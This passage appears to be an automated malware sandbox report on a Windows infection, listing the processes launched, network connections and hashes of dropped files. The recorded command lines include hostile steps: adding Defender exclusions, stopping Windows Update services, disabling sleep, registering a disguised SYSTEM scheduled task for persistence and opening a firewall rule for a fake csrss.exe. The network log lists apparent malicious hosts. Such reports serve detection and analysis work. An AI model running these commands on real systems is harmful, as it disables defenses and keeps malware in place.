"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\5201.exe

C:\Users\Admin\AppData\Local\Temp\5201.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\EB54.exe

C:\Users\Admin\AppData\Local\Temp\EB54.exe

C:\Users\Admin\AppData\Local\Temp\EEC0.exe

C:\Users\Admin\AppData\Local\Temp\EEC0.exe

C:\Users\Admin\AppData\Local\Temp\F048.exe

C:\Users\Admin\AppData\Local\Temp\F048.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,1572425988621779139,7230878463324005505,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3948 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5380 -ip 5380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 796

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 121.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 store.steampowered.com udp
US 104.244.42.65:443 twitter.com tcp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 65.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 18.233.175.4:443 www.epicgames.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 www.paypalobjects.com udp
US 8.8.8.8:53 4.175.233.18.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 128.66.9.65.in-addr.arpa udp
US 151.101.2.133:443 www.paypalobjects.com tcp
US 151.101.2.133:443 www.paypalobjects.com tcp
US 151.101.2.133:443 www.paypalobjects.com tcp
US 8.8.8.8:53 133.2.101.151.in-addr.arpa udp
US 151.101.2.133:443 www.paypalobjects.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.208.118:443 i.ytimg.com tcp
US 8.8.8.8:53 c.paypal.com udp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 8.8.8.8:53 118.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 dub.stats.paypal.com udp
US 64.4.245.84:443 dub.stats.paypal.com tcp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
US 8.8.8.8:53 227.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 c6.paypal.com udp
US 151.101.1.35:443 c6.paypal.com tcp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 pbs.twimg.com udp
NL 199.232.148.159:443 pbs.twimg.com tcp
US 8.8.8.8:53 video.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 t.co udp
US 104.244.42.2:443 api.twitter.com tcp
NL 199.232.148.158:443 video.twimg.com tcp
US 104.244.42.133:443 t.co tcp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 159.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 158.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 2.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 133.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
NL 23.72.252.171:80 apps.identrust.com tcp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 tracking.epicgames.com udp
US 44.214.245.214:443 tracking.epicgames.com tcp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
DE 18.66.97.76:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 76.97.66.18.in-addr.arpa udp
US 8.8.8.8:53 214.245.214.44.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 numpersb.fun udp
US 8.8.8.8:53 killredls.pw udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 169.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 57.53.21.104.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
NL 172.217.168.227:443 www.recaptcha.net udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 194.49.94.80:42359 tcp
US 8.8.8.8:53 facebook.com udp
US 157.240.5.35:443 facebook.com tcp
US 8.8.8.8:53 80.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 35.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
US 157.240.5.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 254.177.238.8.in-addr.arpa udp
US 8.8.8.8:53 163.252.72.23.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 16.64.42.5.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 41.18.21.104.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
RU 5.42.92.51:19057 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 194.49.94.72:80 194.49.94.72 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 72.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 194.49.94.11:80 194.49.94.11 tcp
US 8.8.8.8:53 11.94.49.194.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe

MD5 3d6c252814c63678aab536a66cf02714
SHA1 4d114973cc1e7f531d497f872f647da715a48d8a
SHA256 831182867638cff47bcaab6af88ea6f474fc6cc680cfc7aff84d8824dd985853
SHA512 847bce18dd036cf6706be0daf0cc8a56828c07405e1aec0298e946cc1048c6d2c45a4a3af2834f736a243dd13e4b0f88d0a8f3e911bce20e07f8fb8899af1052

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mI4Lg63.exe

MD5 3d6c252814c63678aab536a66cf02714
SHA1 4d114973cc1e7f531d497f872f647da715a48d8a
SHA256 831182867638cff47bcaab6af88ea6f474fc6cc680cfc7aff84d8824dd985853
SHA512 847bce18dd036cf6706be0daf0cc8a56828c07405e1aec0298e946cc1048c6d2c45a4a3af2834f736a243dd13e4b0f88d0a8f3e911bce20e07f8fb8899af1052

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe

MD5 4be971f30c6bf8b3f71433f62cdb1e9f
SHA1 7cbd130553cecad34044a741cd892958d4f88274
SHA256 b22f6fa8af52af4b674e9f57134a9b448b2606abaa9da047ceec5913e18692c4
SHA512 77abd72f876929a62e22fff085073e16a16d8e777acea65e1dc5b2e8872611d2f41642fa0f28375ecf0d619951217d42ea464506892221a979ed2822aede0ebe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Jt0Dg84.exe

MD5 4be971f30c6bf8b3f71433f62cdb1e9f
SHA1 7cbd130553cecad34044a741cd892958d4f88274
SHA256 b22f6fa8af52af4b674e9f57134a9b448b2606abaa9da047ceec5913e18692c4
SHA512 77abd72f876929a62e22fff085073e16a16d8e777acea65e1dc5b2e8872611d2f41642fa0f28375ecf0d619951217d42ea464506892221a979ed2822aede0ebe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe

MD5 20b9bc364e5afe287ffc6ea34bd947f4
SHA1 b7c141905a600a8d85fc98f599ed16a65921f407
SHA256 477b4e460db06c8859785523aed26d081eb6c9cc6ca69881e03f7b539d3bc47b
SHA512 f44542ab6d0dd148d7767d6cfadef58de3f57c4f12a5e04be725860142b94eed26ae6f5d849dfdab051e9cde8998a6ae62c09c12db59d7dc0691ae11b544d8fe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tn2wy09.exe

MD5 20b9bc364e5afe287ffc6ea34bd947f4
SHA1 b7c141905a600a8d85fc98f599ed16a65921f407
SHA256 477b4e460db06c8859785523aed26d081eb6c9cc6ca69881e03f7b539d3bc47b
SHA512 f44542ab6d0dd148d7767d6cfadef58de3f57c4f12a5e04be725860142b94eed26ae6f5d849dfdab051e9cde8998a6ae62c09c12db59d7dc0691ae11b544d8fe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe

MD5 1e6dc43f1999e866edf2fa8e58a28315
SHA1 71f884c180dc29f34bde3e5e59c4b268aa4e5d9c
SHA256 efab6300527fe7c7310d2e277ef4b8b3ff067572f0628a1ec67afbb74bb79d76
SHA512 cd3f77cc7ccd249422a4bf6372e7cafcfe09b0a591f0eabc775485164f6f27a7bf893ee08a0cdfda7a631cba754a0e49306dd79b4758abb74fd1cabd09a19455

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1EJ85mX1.exe

MD5 1e6dc43f1999e866edf2fa8e58a28315
SHA1 71f884c180dc29f34bde3e5e59c4b268aa4e5d9c
SHA256 efab6300527fe7c7310d2e277ef4b8b3ff067572f0628a1ec67afbb74bb79d76
SHA512 cd3f77cc7ccd249422a4bf6372e7cafcfe09b0a591f0eabc775485164f6f27a7bf893ee08a0cdfda7a631cba754a0e49306dd79b4758abb74fd1cabd09a19455

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

